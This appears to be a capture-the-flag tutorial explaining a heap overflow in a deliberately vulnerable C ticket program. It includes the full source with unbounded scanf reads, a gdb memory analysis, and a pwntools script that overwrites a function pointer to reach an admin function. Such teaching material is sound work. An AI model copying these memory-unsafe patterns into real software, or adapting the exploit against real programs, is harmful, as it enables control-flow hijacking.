Challenge example
The exploitation of a Heap overflow depend on the program implementation. With this example, the attacker can exploit this in order to jump to an arbitrary function : "admin"
Source code
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
struct user{
char username[32];
char password[32];
};
typedef struct ticket {
void (*display)(struct ticket*);
char username[32];
char content[24];
} Ticket;
void display(Ticket *t){
printf("%s\n", t->content);
}
char login(struct user *u){
char secret[16] = "";
char c;
FILE *fp = fopen(".passwd", "r");
fread(secret, 1, 15, fp);
fclose(fp);
secret[15] = '\0';
if (strcmp(u->password, secret) == 0 && strcmp(u->password, "admin") == 0) {
return 1;
} else {
return 0;
}
}
void admin(){
printf("Welcome admin\n");
// Make admin stuff
}
int main(int argc, char **argv){
int log;
char c=1, i;
char buf[8];
struct user *u = malloc(sizeof(struct user));
strcpy(u->username, "Guest");
strcpy(u->password, "");
struct ticket *t = malloc(sizeof(struct ticket));
t->display = display;
strcpy(t->content, "");
strcpy(t->username, u->username);
while(c){
printf("Press enter char to continue...");
fgets(buf, 8, stdin);
getchar();
printf("\e[1;1H\e[2J");
printf("Welcome %-10s.\nWhat to do you want to do ?\n", u->username);
printf("1 - Read ticket\n");
printf("2 - Create ticket\n");
printf("3 - Delete ticket\n");
printf("4 - Submit tickets\n");
printf("5 - login\n");
printf("0 - Exit\n");
printf("Choice > ");
scanf("%1s", buf);
i = buf[0];
printf("\e[1;1H\e[2J");
switch (i) {
case '0':
c = 0;
break;
case '1':
printf("Resume : \n");
t->display(t);
break;
case '2':
printf("Ticket content : \n");
scanf("%24s",t->content);
fflush(stdout);
break;
case '5':
printf("Please enter credentials : \n");
printf("Username : ");
scanf("%s", u->username);
printf("Password : ");
scanf("%s", u->password);
if (login(u) == 1){
admin();
}
break;
default:
printf("Function not yet implemented !\n");
}
}
return 0;
}
Structures
There is two used structure inside this program :
user
struct user{
char username[32];
char password[32];
};
This structure has a size = 64 bytes ( 32 for username and 32 for password )
ticket
typedef struct ticket {
void (*display)(struct ticket*);
char username[32];
char content[24];
} Ticket;
This structure has a size = 64 bytes ( 8 for *display , 32 for username and 24 for content )
login()
char login(struct user *u){
char secret[16] = "";
char c;
FILE *fp = fopen(".passwd", "r");
fread(secret, 1, 15, fp);
fclose(fp);
secret[15] = '\0';
if (strcmp(u->password, secret) == 0 && strcmp(u->password, "admin") == 0) {
return 1;
} else {
return 0;
}
}
This function will simply compare the username and the password with those for the admin user, if it's equals than the user is admin else it's a guest.
main
There is two parts into this function :
Variables setup
int log;
char c=1, i;
char buf[8];
struct user *u = malloc(sizeof(struct user));
strcpy(u->username, "Guest");
strcpy(u->password, "");
struct ticket *t = malloc(sizeof(struct ticket));
t->display = display;
strcpy(t->content, "");
strcpy(t->username, u->username);
This part setup needed variables.
Menu loop
while(c){
printf("Press enter char to continue...");
fgets(buf, 8, stdin);
getchar();
printf("\e[1;1H\e[2J");
printf("Welcome %-10s.\nWhat to do you want to do ?\n", u->username);
printf("1 - Read ticket\n");
printf("2 - Create ticket\n");
printf("3 - Delete ticket\n");
printf("4 - Submit tickets\n");
printf("5 - login\n");
printf("0 - Exit\n");
printf("Choice > ");
scanf("%1s", buf);
i = buf[0];
printf("\e[1;1H\e[2J");
switch (i) {
case '0':
c = 0;
break;
case '1':
printf("Resume : \n");
t->display(t);
break;
case '2':
printf("Ticket content : \n");
scanf("%24s",t->content);
fflush(stdout);
break;
case '5':
printf("Please enter credentials : \n");
printf("Username : ");
scanf("%s", u->username);
printf("Password : ");
scanf("%s", u->password);
if (login(u) == 1){
admin();
}
break;
default:
printf("Function not yet implemented !\n");
}
}
The user have some possible actions :
Read ticket
This action will call the display
function pointed by the pointer stored inside the ticket.
Create ticket
This action will set the content and username values of the ticket
login
This action permit to the user to provide username
and password
to login.
Exploitation
As explain before, the two allocated chunk are side by side in memory and have the exact same size (64 bytes)
The objective is to overwrite the display
pointer to make it point to the admin
function.
Let's check the memory state :
gdb-peda$ i locals
log = <optimized out>
c = 0x1
i = 0x35
buf = "5\000\000\000\000\000\000"
u = 0x4052a0
t = 0x4052f0
u
is stored at 0x4052a0
and t
at 0x4052f0
By using login
action, 10 A
are put as username and 10 B
as password to clearly identified their position in memory
The same is used for ticket content with 10 C
gdb-peda$ x/20x 0x4052a0
0x4052a0: 0x4141414141414141 0x0000000000004141
0x4052b0: 0x0000000000000000 0x0000000000000000
0x4052c0: 0x4242424242424242 0x4242424242004242
0x4052d0: 0x0000000000004242 0x0000000000000000
0x4052e0: 0x0000000000000000 0x0000000000000051
0x4052f0: 0x00000000004012b6 0x0000007473657547
0x405300: 0x0000000000000000 0x0000000000000000
0x405310: 0x0000000000000000 0x4343434343434343
0x405320: 0x0000000000004343 0x0000000000000000
0x405330: 0x0000000000000000 0x0000000000000411
To overwrite the display
pointer, it's needed to overwrite 0x4052f0 - 0x4052c0 = 48
bytes before writing the arbitrary address.
The data send as password will then be : "A"*48 + p64(elf.symbols['admin'])
Exploit script
from pwn import *
elf = context.binary = ELF("./chall")
p = process()
p.sendline()
target = p64(elf.symbols['admin'])
def choice(c):
p.sendline()
p.recv(timeout=1)
p.sendline(c)
def login(username, password):
choice(b'5')
p.recv(timeout=1)
p.sendline(username)
p.recv(timeout=1)
p.sendline(password)
login(b"A", b"B"*48 + target)
choice(b'1')
p.interactive()
p.close()
Exercice
If you want to try this exploit by yourself, you can pull this docker image :
docker pull thectfrecipes/pwn:heap_overflow
Deploy the image using the followed command :
docker run --name heap_overflow -it --rm -d -p 3000:3000 thectfrecipes/pwn:heap_overflow
Access to the web shell with your browser at the address : http://localhost:3000/
login: challenge
password: password
Last updated